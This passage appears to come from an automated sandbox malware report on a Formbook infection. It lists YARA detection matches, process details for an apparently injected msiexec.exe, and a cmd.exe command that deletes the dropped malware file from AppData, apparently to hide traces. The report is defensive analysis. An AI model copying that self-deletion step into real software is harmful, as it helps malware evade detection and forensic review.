                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:16:42:41
                                              Start date:27/10/2021
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\msiexec.exe
                                              Imagebase:0xb50000
                                              File size:73216 bytes
                                              MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:16:42:45
                                              Start date:27/10/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'
                                              Imagebase:0x4a880000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis
